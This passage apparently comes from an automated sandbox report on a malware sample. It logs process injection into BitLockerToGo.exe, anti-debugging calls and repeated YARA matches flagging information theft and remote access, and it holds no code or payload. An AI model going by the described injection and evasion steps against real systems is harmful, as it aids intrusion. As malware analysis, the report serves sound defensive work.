Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030673DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_030673DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03069DC7 SetUnhandledExceptionFilter, 1_2_03069DC7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and write
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5A
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E9C008
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030643C0 GetUserNameA, 1_2_030643C0

Stealing of Sensitive Information

Source: Yara match File source: LisectAVT_2403002A_326.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.1894092597.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1703746830.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002A_326.exe PID: 6992, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: LisectAVT_2403002A_326.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.1894092597.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1703746830.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002A_326.exe PID: 6992, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
No contacted IP infos